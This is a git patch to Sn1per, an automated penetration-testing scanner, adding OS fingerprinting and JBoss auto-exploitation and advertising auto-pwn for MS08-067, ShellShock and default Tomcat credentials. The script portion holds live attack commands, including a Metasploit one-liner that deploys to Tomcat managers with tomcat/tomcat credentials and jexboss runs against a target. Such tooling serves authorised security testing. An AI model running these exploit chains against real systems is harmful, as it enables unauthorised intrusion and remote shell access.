From 1633aa16f2bcdf25be8eb372e477ac2416a04784 Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Sun, 10 Apr 2016 20:58:34 -0700
Subject: [PATCH] Sn1per by 1N3 @CrowdShield

---
 README.md      |  6 ++++++
 install.sh     |  4 +++-
 loot/README.md |  6 ++++++
 sniper         | 17 ++++++++++++++---
 4 files changed, 29 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index f6b488d..986e3b1 100644
--- a/README.md
+++ b/README.md
@@ -13,7 +13,9 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 * Automatically runs targeted Metasploit scan and exploit modules
 * Automatically scans all web applications for common vulnerabilities
 * Automatically brute forces all open services
+* Automatically exploit remote hosts to gain remote shell access
 * Performs high level enumeration of multiple hosts
+* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
 
 ## INSTALL:
 ```
@@ -46,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
 ```
 
 ## CHANGELOG:
+* v1.6d - Added xprobe2 OS finger printing tool
+* v1.6d - Added jexbos JBoss autopwn
+* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
+* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
 * v1.6c - Add report mode for web scans
 * v1.6c - Fixed issues with Sublist3r and theharvester
 * v1.6c - Added Shocker Shellshock exploitation scanner
diff --git a/install.sh b/install.sh
index 740f626..f07329b 100644
--- a/install.sh
+++ b/install.sh
@@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta
 read answer
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install cutycapt unicornscan waffit host whois arachni theHarvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
+apt-get install xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
@@ -45,6 +45,7 @@ git clone https://github.com/0xsauby/yasuo.git
 git clone https://github.com/johndekroon/serializekiller.git
 git clone https://github.com/aboul3la/Sublist3r.git
 git clone https://github.com/nccgroup/shocker.git
+git clone https://github.com/joaomatosf/jexboss.git
 
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
 mkdir loot 2> /dev/null
@@ -55,6 +56,7 @@ chmod +x $DIR/XSSTracer/xsstracer.py
 chmod +x $DIR/MassBleed/massbleed
 chmod +x $DIR/MassBleed/heartbleed.py
 chmod +x $DIR/MassBleed/openssl_ccs.pl
+chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
 rm -f /usr/bin/sniper
 rm -f /usr/bin/goohak
 rm -f /usr/bin/xsstracer
diff --git a/loot/README.md b/loot/README.md
index f6b488d..986e3b1 100644
--- a/loot/README.md
+++ b/loot/README.md
@@ -13,7 +13,9 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 * Automatically runs targeted Metasploit scan and exploit modules
 * Automatically scans all web applications for common vulnerabilities
 * Automatically brute forces all open services
+* Automatically exploit remote hosts to gain remote shell access
 * Performs high level enumeration of multiple hosts
+* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
 
 ## INSTALL:
 ```
@@ -46,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
 ```
 
 ## CHANGELOG:
+* v1.6d - Added xprobe2 OS finger printing tool
+* v1.6d - Added jexbos JBoss autopwn
+* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
+* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
 * v1.6c - Add report mode for web scans
 * v1.6c - Fixed issues with Sublist3r and theharvester
 * v1.6c - Added Shocker Shellshock exploitation scanner
diff --git a/sniper b/sniper
index 5db39cf..eaa7992 100644
--- a/sniper
+++ b/sniper
@@ -89,7 +89,7 @@ fi
 
 if [ "$MODE" = "stealth" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 		exit
 	fi
 	echo -e "$OKRED                ____               $RESET"
@@ -150,17 +150,20 @@ if [ "$MODE" = "stealth" ]; then
 	echo ""
 	echo -e "$OKGREEN################################### Running passive scans #########################$RESET"
 	unicornscan $TARGET 2> /dev/null
+	xprobe2 $TARGET
 	wafw00f http://$TARGET
 	whatweb http://$TARGET
 	xsstracer $TARGET 80
 	sslscan --no-failed $TARGET
 	cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
+	echo -e "$OKGREEN################################### Done! #########################################$RESET"
+	clear
 	exit
 fi
 
 if [ "$MODE" = "airstrike" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 		exit
 	fi
 	echo -e "$OKRED                ____               $RESET"
@@ -217,11 +220,15 @@ if [ "$MODE" = "airstrike" ]; then
 		echo ""
 		echo -e "$OKGREEN################################### Running passive scans #########################$RESET"
 		unicornscan $a 2> /dev/null
+		xprobe2 $TARGET
 		wafw00f http://$a
 		whatweb http://$a
 		xsstracer $a 80
 		sslscan --no-failed $a
 		cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
+		echo -e "$OKGREEN################################### Done! #########################################$RESET"
+		clear
+		exit
 	done;
 	exit
 fi
@@ -265,6 +272,7 @@ if [ "$MODE" = "nuke" ]; then
 		echo -e "$OKRED --------------------------------------------------------- $RESET"
 		echo -e "$OKGREEN + -- --=[WARNING! Nuking ALL target! $RESET"
 		./sniper $a
+		clear
 	done
 fi
 
@@ -281,6 +289,7 @@ echo -e "$RESET"
 echo -e "$OKGREEN################################### Running recon #################################$RESET"
 nslookup $TARGET
 host $TARGET
+xprobe2 $TARGET
 if [ $SCAN_TYPE == "DOMAIN" ];
 then
 	dig -x $TARGET
@@ -302,7 +311,7 @@ if [ -z "$OPT1" ]; then
 	nmap -sS -sV -T4 -A -O -p 1-65535 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 	nmap -sU -sV -T4 -A -O -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 --open $TARGET
 elif [ "$OPT1" == "web" ]; then
-	nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-web-$TARGET.xml
+	nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 else
 	nmap -sS -sV -T4 -A -O -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
 	nmap -sU -sV -T4 -A -O -p U:$OPT1 --open $TARGET
@@ -821,6 +830,8 @@ else
 	nmap -p 8080 --script=*proxy* $TARGET
 	#arachni http://$TARGET:8080 --output-only-positives
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
+	python jexboss/jexboss.py http://$TARGET:8080
+	python jexboss/jexboss.py https://$TARGET:8080
 fi
 
 if [ -z "$port_8180" ]